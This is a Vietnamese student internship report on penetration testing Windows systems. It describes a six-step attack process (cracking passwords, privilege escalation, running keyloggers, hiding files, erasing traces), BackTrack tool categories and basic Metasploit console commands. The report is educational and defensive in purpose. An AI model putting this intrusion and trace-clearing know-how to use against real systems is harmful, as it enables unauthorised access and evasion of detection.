Báo cáo thực tập system hacking
Trang 1TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ VIỄN THÔNG
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO THỰC TẬP SYSTEM HACKING
Giảng Viên Hướng Dẫn : Võ Đỗ Thắng
Sinh Viên Thực Hiện: Huỳnh Quốc Anh
Thành phố Hồ Chí Minh năm 2014
Trang 2SVTH: Huỳnh Quốc Anh Trang 1
MỞ ĐẦU
Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã
có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Theo nhìn nhận của Bkav, đã có những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập
hệ thống công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về công nghệ
Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế -
xã hội và đảm bảo quốc phòng, an ninh
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời đại Internet ngày nay
Huỳnh Quốc Anh
Trang 3SVTH: Huỳnh Quốc Anh Trang 2
LỜI CẢM ƠN KHOA ĐIỆN TỬ VIỄN THÔNG TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN TPHCM
Em xin chân thành cảm ơn trường Đại Học Khoa Học Tự Nhiên TPHCM và khoa Điện Tử Viễn Thông đã tạo điều kiện cho em hoàn thành tốt đợt Thực Tập này Trong đợt thực tập này đã cho em những kinh nghiệm quý báu Những kinh nghiệm này sẽ giúp Em hoàn thiện hơn trong công việc và môi trường làm việc sau này
Mặc dù em đã cố gắng hoàn thành báo cáo thực tập này với tất cả nỗ lực của bản thân Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn không thể tránh khỏi những thiếu sót nhất định Em rất mong nhận được sự đóng góp, chia sẻ để tôi có thể làm tốt hơn nữa
Một lần nữa em xin chân thành cảm ơn
TPHCM, ngày 18 tháng 08 năm 2014
Sinh viên thực tập
Huỳnh Quốc Anh
Trang 4SVTH: Huỳnh Quốc Anh Trang 3
LỜI CẢM ƠN TRUNG TÂM ATHENA
Em xin cảm ơn giám đốc Công Ty Quản Trị và An Ninh Mạng Quốc Tế Athena, cùng các anh chị trong công ty Đặc biệt, em xin chân thành cảm ơn thầy Đỗ Võ Thắng đã nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập tại công ty Thầy đã tạo mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý kiến quý báu để hoàn thành tốt bài báo cáo này
Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và tạo điều kiện cho em hoàn thành đề tài này
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô tại trung tâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh nghiệm trong các công trình tìm hiểu, phát triển sau này
Một lần nữa tôi xin chân thành cảm ơn
TPHCM, ngày 18 tháng 08 năm 2014
Sinh viên thực tập
Huỳnh Quốc Anh
Trang 5SVTH: Huỳnh Quốc Anh Trang 4
GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi nhọn, góp phần phát triển nước nhà
Lĩnh vực hoạt động chính:
– Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH, Song song
đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính
– Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,…
– Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ CHính Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự , Đội ngũ giảng viên :
– Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường đại học hàng đầu trong nước Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc
tế (Microsoft Certified Trainer).Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm ATHENA
– Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,
Trang 6SVTH: Huỳnh Quốc Anh Trang 5
và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung tâm ATHENA
Điện thoại: 0943200088
(08)22103801 Cạnh sân vận động Hoa Lư - Cách đài truyền hình Tp HTV 50 mét – Website: http://athena.edu.vn
http://athena.com.vn
– E-mail : support@athena.edu.vn
tuvan@athena.edu.vn
Trang 7SVTH: Huỳnh Quốc Anh Trang 6
NHẬN XÉT CỦA KHOA
TPHCM, ngày tháng năm 2014
Trang 8SVTH: Huỳnh Quốc Anh Trang 7
NHẬN XÉT CỦA CÔNG TY THỰC TẬP
TPHCM, ngày tháng năm 2014
Giám đốc
Trang 9SVTH: Huỳnh Quốc Anh Trang 8
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN
TPHCM, ngày tháng năm 2014
Giảng viên hướng dẫn
Trang 10SVTH: Huỳnh Quốc Anh Trang 9
MỤC LỤC
MỞ ĐẦU 1
LỜI CẢM ƠN TRUNG TÂM ATHENA 3
GIỚI THIỆU CHUNG VỀ CÔNG TY THỰC TẬP 4
NHẬN XÉT CỦA KHOA 6
NHẬN XÉT CỦA CÔNG TY THỰC TẬP 7
NHẬN XÉT CỦA GIẢNG VIÊN HƯỚNG DẪN 8
PHẦN 1: GIỚI THIỆU 11
1 System Hacking và Tình hình an ninh mạng Việt Nam 11
2 Các lỗ hổng thường khai thác trong hệ điều hành Windows .11
3 Quá trình tấn công vào một hệ thống 12
PHẦN 2: VMWARE VÀ ẢO HÓA HỆ ĐIỀU HÀNH 14
PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN 19
1 Hệ điều hành Backtrack 5 R3 19
2 Phần mềm Metasploit 20
Sử dụng Metasploit Framework: 21
2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai thác 21
2.2 Cấu hình Module exploit đã chọn: 22
2.3 Verify những options vừa cấu hình: 22
2.4 Lựa chọ n target: 22
2.5 Lựa chọ n payload: 22
2.6 Thực thi exploit: 22
3 Sơ đồ tổng quan hệ thống mạng LAN 23
4 Xâm nhập và khai thác Windows XP .24
4.1 Khai thác lổ hỏng Ms10-042 24
4.2 Khai thác lổ hỏng Ms12-004 25
4.3 Khai thác lổ hỏng file PDF qua Adobe Reader 9.x 26
4.4 Khai thác lỗ hỏng Ms12-027 27
4.5 Khai thác thông tin sau khi đã t ấn công: 29
Trang 11SVTH: Huỳnh Quốc Anh Trang 10
PHẦN 4: XÂY DỰNG HONEYPOT KHAI THÁC XÂM NHẬP LỖ HỔNG
TỪ XA QUA MẠNG INTERNET 31
1 Máy Chủ Ảo (VPS) 31
1.1 Định nghĩa 31
1.2 Đặc điểm về thông số VPS 31
2 Honeypot 32
3 Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa qua Internet 32
4 Tấn công qua Internet 33
4.1 Các lỗi bảo mật: 33
4.2 Cách tấn công: 35
4.3 Phương pháp khắc phục lỗ hổng 36
PHẦN 5: TỔNG KẾT 37
PHỤ LỤC: HƯỚNG DẪN CÀI ĐẶT MỘT SỐ PHẦN MỀM 38
1 Cài đặt VMware 38
2 Cài đặt máy ảo bằng VMware: 45
3 Cài đặt Metasploit trên VPS 50
CÁC CLIP HƯỚNG DẪN 56
DANH MỤC TÀI LIỆU THAM KHẢO 57
Trang 12SVTH: Huỳnh Quốc Anh Trang 11
PHẦN 1: GIỚI THIỆU
1 System Hacking và Tình hình an ninh mạng Việt Nam
System hacking bao gồm những kỹ thuật lấy username, password dựa vào phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của hệ điều hành Windows Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa những log file hệ thống Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ chức
2 Các lỗ hổng thường khai thác trong hệ điều hành Windows
Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng
mã Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi trong đó có chứa những lỗi lập trình, được biết đến với tên gọi lỗ hổng Những lỗ hổng này được Hacker sử dụng để xâm nhập vào hệ thống, cũng như được tác giả của các đọan mã độc dùng để khởi động chương trình của họ một cách tự động trên máy tính của bạn
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điều hành, các Web Server hay các phần mềm khác, Và các hãng sản xuất luôn cập nhật các lỗ hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản trước Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này
để tấn công vào hệ thống Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ điều hành Windows Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của Microsoft
Trang 13SVTH: Huỳnh Quốc Anh Trang 12
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật Các chương trình độc hại được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit, đang ngày càng phổ biến nhanh chóng
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH Windows, Internet Explorer, Windows Server, Microsoft Exchange và NetFramework
3 Quá trình tấn công vào một hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống Mục tiêu phía trước của chúng ta là một hệ thống máy tính Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên cạnh Nó gồm 6 công đoạn như sau:
Quá trình tấn công vào một hệ thống
Trang 14SVTH: Huỳnh Quốc Anh Trang 13
– Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong
hệ thống Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính xác hơn
– Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng nhập của user Hoặc bằng một cách nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống
– Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công
– Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích Chuẩn bị trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công
– Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt
– Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết Những thông tin
có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì Nếu không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những
kỹ thuật như Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng cho mục đích truy tìm thông tin
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công hệ thống thật sự Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa
dữ liệu, chạy chương trình trojan, keylogger…
Trang 15SVTH: Huỳnh Quốc Anh Trang 14
PHẦN 2: VMWARE VÀ ẢO HÓA HỆ ĐIỀU HÀNH
1 Giới thiệu VMware
VMware Workstation là một phần mềm ảo hóa desktop mạnh mẽ dành cho
các nhà phát triển/kiểm tra phần mềm và các chuyên gia IT cần chạy nhiều HĐH một lúc trên một máy PC Người dùng có thể chạy các HĐH Windows, Linux, Netware hay Solaris x86 trên các máy ảo di động mà không cần phải khởi động lại hay phân vùng ổ cứng VMware Workstation cung cấp khả năng hoạt động tuyệt vời và nhiều tính năng mới như tối ưu hóa bộ nhớ và khả năng quản lý các thiết lập nhiều lớp Các tính năng thiết yếu như mạng ảo, chụp ảnh nhanh trực tiếp, kéo thả, chia sẻ thư mục và hỗ trợ PXE khiến VMware Workstation trở thành công cụ mạnh mẽ nhất và không thể thiếu cho các nhà doanh nghiệp phát triển tin học và các nhà quản trị hệ thống
Với hàng triệu khách hàng và hàng loạt các giải thưởng quan trọng, VMware Workstation đã được chứng minh là một công ghệ giúp tăng năng suất và sự linh họat trong công việc Đây là một công cụ không thể thiếu cho các nhà phát triển phần mềm và các chuyên gia IT trên toàn thế giới
VMware Workstation họat động bằng cách cho phép nhiều HĐH và các ứng dụng của chúng chạy đồng thời trên một máy duy nhất Các HĐH và ứng dụng này được tách ra vào trong các máy ảo Những máy ảo này cùng tồn tại trên một phần cứng duy nhất Các layer ảo của VMware sẽ kết nối các phần cứng vật lý với các máy ảo, do đó mỗi máy ảo sẽ có CPU, bộ nhớ, các ổ đĩa, thiết bị nhập/xuất riêng Các tính năng cho người dùng
– Thiết lập và thử nghiệm các ứng dụng đa lớp, cập nhật ứng dụng và các miếng vá cho HĐH chỉ trên một PC duy nhất
– Dễ dàng phục hồi và chia sẻ các môi trường thử nghiệm được lưu trữ; giảm thiểu các thiết lập trùng lặp và thời gian thiết lập
– Làm cho việc học tập trên máy tính thuận lợi hơn do sinh viên luôn đuợc
sử dụng máy với tình trạng “sạch sẽ” và thử nghiệm với nhiều HĐH, ứng dụng cá các công cụ trên những máy ảo an tòan và độc lập
Trang 16SVTH: Huỳnh Quốc Anh Trang 15
– Chạy các bản demo phần mềm với các thiết lập phức tạp hoặc đa lớp trên một chiếc laptop
– Tăng tốc độ giải quyết các rắc rối của người dùng cuối dựa trên một thư viện các máy ảo được thiết lập sẵn
– Integrated Virtual Debugger: Workstation được tích hợp Visual Studio
và Eclipse nên bạn có thể trực tiếp sử dụng, chạy và vá các lỗ hổng của các chương trình trong một VM từ một IDE yêu thích
– Automation APIs (VIX API 2.0): Bạn có thể viết script hay chương trình
để VM tự động thực hiện việc kiểm tra
2 Cách tạo nên các máy ảo từ VMware:
Để sử dụng VMware đầu tiên chúng ta cần tạo nên một máy ảo, nơi mà chúng
ta sẽ dùng để cài đặt nên các hệ điều hành Chúng ta có thể tuỳ chọn dung lượng ổ cứng, dung lượng RAM, cách kết nối mạng của máy ảo… Việc tiếp theo cần làm là cài đặt nên một hệ điều hành trên máy ảo đó Hiện tại, VMware hỗ trợ cài đặt rất nhiều dạng hệ điều hành Chúng ta có thể cài các phiên bản của Windows, Linux, Unix… trên các máy ảo VMware Việc cài đặt hệ điều hành trên máy ảo hoàn toàn tương tự như cách cài đặt trên các máy thật
Trang 17SVTH: Huỳnh Quốc Anh Trang 16
3 Chia sẻ tài nguyên của các máy ảo:
Chia sẻ CPU và RAM: Các máy ảo sẽ chia sẻ CPU và RAM của máy tính thật
Để đảm bảo hệ thống có thể chạy tốt, yêu cầu máy tính thật phải có cấu hình tương đối cao, khoảng 1GB RAM để có thể chạy đồng thời 4, 5 máy ảo
Chia sẻ ổ cứng: Khi tạo ra các máy ảo, chúng ta sẽ tạo ra một ổ cứng dành riêng cho máy ảo nằm trên máy thật Ổ cứng ảo này được tạo trên vùng đĩa trống của ổ đĩa thật, do đó không ảnh hưởng đến các dữ liệu đang có trên ổ đĩa thật Chúng ta có thể tuỳ chọn dung lượng của ổ cứng này, có thể ấn định ngay dung lượng hoặc cũng có thể để dung lượng của ổ cứng này là động, sẽ thay đổi tuỳ theo quá trình sử dụng của chúng ta sau này
Chia sẻ card mạng: Sau khi cài đặt lên, VMware sẻ tạo nên 2 card mạng VMware 1 và VMware 8 trên máy thật và máy thật có thể sử dụng 2 card mạng này để kết nối với các máy ảo Khi lựa chọn cấu hình mạng cho các máy ảo, ta có thể chọn một trong các chế độ sau:
– Bridged networking: Card mạng của máy ảo sẽ được gắn trực tiếp với card mạng của máy thật (sử dụng switch ảo VMnet0) Lúc này, máy ảo sẽ đóng vai trò như một máy trong mạng thật, có thể nhận DHCP từ mạng ngoài, hoặc đặt IP tĩnh cùng dải với mạng ngoài để giao tiếp với các máy ngoài mạng hoặc lên Internet
Cấu trúc mạng Bridged Networking
Trang 18SVTH: Huỳnh Quốc Anh Trang 17
– NAT: Máy ảo được cấu hình NAT sẽ sử dụng IP của máy thật để giao tiếp với mạng ngoài Các máy ảo được cấp địa chỉ IP nhờ một DHCP ảo của VMware Lúc này, các máy ảo sẽ kết nối với máy thật qua switch ảo VMnet8, và máy thật sẽ đóng vai trò NAT server cho các máy ảo
Cấu trúc mạng NAT
– Host-only Networking: Khi cấu hình máy ảo sử dụng host-only networking, máy ảo sẽ được kết nối với máy thật trong một mạng riêng thông qua Switch ảo VMnet1 Địa chỉ của máy ảo và máy thật trong mạng host-only có thể được cấp bởi DHCP ảo gắn liền với Switch ảo Vmnet1 hoặc có thể đặt địa chỉ IP tĩnh cùng dải để kết nối với nhau
Cấu trúc mạng Host-Only
Trang 19SVTH: Huỳnh Quốc Anh Trang 18
– Ngoài các kết nối trên, ta có thể sử dụng các switch ảo trong VMware để kết nối các máy ảo thành một hệ thống như mong muốn Khi cài đặt lên, VMware tạo sẵn cho chúng ta 10 Switch ảo từ VMnet0 đến VMnet9 Ngoài các Switch ảo VMnet0 (dùng cho mạng Bridged Networking), VMnet8 (dùng cho mạng Nat Networking) và VMnet1 (dùng cho mạng Host-Only Networking), chúng ta còn 7 Switch ảo khác để thực hiện việc kết nối các máy ảo Chúng ta có thể đặt IP động trên các máy nối với các Switch này để nhận DHCP ảo, hoặc có thể đặt IP tĩnh cùng dải cho các máy này đảm bảo chúng kết nối được với nhau
Chia sẻ ổ đĩa CD-ROM: Các máy ảo có thể sử dụng ổ CD-ROM của máy thật Ngoài ra, ta có thể dùng một file ISO để đưa vào ổ CD-ROM của máy ảo, lúc này máy ảo sẽ nhận file ISO giống như một đĩa CD-ROM trong ổ đĩa của mình
4 Sử dụng Snapshot:
Snapshot một máy ảo cho phép ta lưu lại trạng thái của máy ảo tại thời điểm đó Snapshot sẽ lưu lại thông tin về ổ cứng, Ram và các Setting trên máy ảo Sau khi lưu snapshot, chúng ta có thể quay trở lại trạng thái của máy ảo bất cứ lúc nào VMware cho phép chúng ta lưu nhiều snapshot của máy ảo, vì thế người dùng có thể sử dụng một máy ảo vào nhiều ngữ cảnh khác nhau, tiết kiệm thời gian cho việc cấu hình Chẳng hạn với một máy ảo A, trong một bài lab ta muốn nó là một máy chủ Domain Controller, nhưng trong bài lab khác ta muốn xấy dựng nó thành một máy chủ ISA Để giải quyết vấn đề này, chúng ta có thể lưu snapshot của máy
A tại thời điểm nó là domain controller, sau đó cấu hình nó thành một máy chủ ISA và lưu snapshot Khi cần sử dụng máy ảo A với vai trò là một Domain Controller hay ISA, ta sẽ dùng trình quản lý Snapshot Manager để chuyển tới trạng thái mong muốn
Trang 20SVTH: Huỳnh Quốc Anh Trang 19
PHẦN 3: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP
TRONG MẠNG LAN
1 Hệ điều hành Backtrack 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm xâm nhập Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor Trong phiên bản hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu 11.10
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas M.(www.slax.org)) Backtrack liên tục cập nhật các công cụ, drivers, Hiện tại Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật Backtrack là
sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm thâm nhập của chúng ta Các công cụ kiểm tra thâm nhập trong Backtrack
5 có thể được phân loại như sau:
– Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail, trang web, máy chủ mail, và như vậy Thông tin này được th u thập từ các thông tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu
– Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và cũng làm portscanning
– Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP)
– Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web
Trang 21SVTH: Huỳnh Quốc Anh Trang 20
– Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này
– Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu
– Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất
– Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập
– Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này
– Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ
có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn
– Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng
để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi
– Chúng ta có thể tải bản Backtrack 5 tại địa chỉ:
www.backtracklinux.org/downloads/
2 Phần mềm Metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống phát hiện tấn công mạng Metasploit Framework là một môi trường dùng để kiểm tra, tấn công và khai thác lỗi của các service Metasploit được xây dựng từ ngôn
Trang 22SVTH: Huỳnh Quốc Anh Trang 21
ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler,
và Python Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS Chúng ta có thể download chương trình tại www.metasploit.com
Metasploit hỗ trợ nhiều giao diện với người dùng:
– Console interface: dùng lệnh msfconsole Msfconsole interface sử dụng các dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn
– Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện Web
– Command line interface: dùng msfcli
Metasploit Enviroment:
– Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module exploits
– Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset, enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã cấu hình thông qua lệnh save Môi trường đó sẽ được lưu trong /msf/config và sẽ được load trở lại khi user interface được thực hiện
Sử dụng Metasploit Framework:
2.1 Chọn module exploit: Lựa chọn chương trình, dịch vụ lỗi mà Metasploit
có hỗ trợ để khai thác
Show exploits: xem các module exploit mà framework có hỗ trợ
Use exploit_name: chọn module exploit
Info exploit_name: xem thông tin về module exploit
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
svnupdat/opt/metasploit/msf3/
Trang 23SVTH: Huỳnh Quốc Anh Trang 22
2.2 Cấu hình Module exploit đã chọn:
show options: Xác định những options nào cần cấu hình
set: cấu hình cho những option của module đó
Một vài module còn có những advanced options, chúng ta có thể xem bằng cách gõ dòng lệnh show advanceds
2.3 Verify những options vừa cấu hình:
check: kiểm tra xem những option đã được set chính xác chưa
2.4 Lựa chọn target:
show targets: những target được cung cấp bởi module đó
set: xác định target nào
2.5 Lựa chọn payload:
show payloads: liệt kê ra những payload của module exploit hiện tại
info payload_name: xem thông tin chi tiết về payload đó
set payload payload_name: xác định payload module name Sau khi lựa chọn payload nào, dùng lệnh show options để xem những options của payload đó
show advanced: xem những advanced options của payload đó
2.6 Thực thi exploit:
exploit: lệnh dùng để thực thi payload code Payload sau đó sẽ cung cấp cho chúng ta những thông tin về hệ thống được khai thác
Trang 24SVTH: Huỳnh Quốc Anh Trang 23
3 Sơ đồ tổng quan hệ thống mạng LAN
Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin, máy in, máy quét và một số thiết bị khác Khi một máy tính ở trong mạng LAN, nó có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ IP các host có trong mạng
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và kiểm toán an ninh Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc tường lửa nào đang sử dụng, và nhiều đặc điểm khác Nmap chạy được trên tất cả các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và Mac OSX
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai
Trang 25SVTH: Huỳnh Quốc Anh Trang 24
thác truy cập vào hệ thống Một trong số các công cụ quét lỗi này là Nessus, download tại địa chỉ http://www.nessus.org/
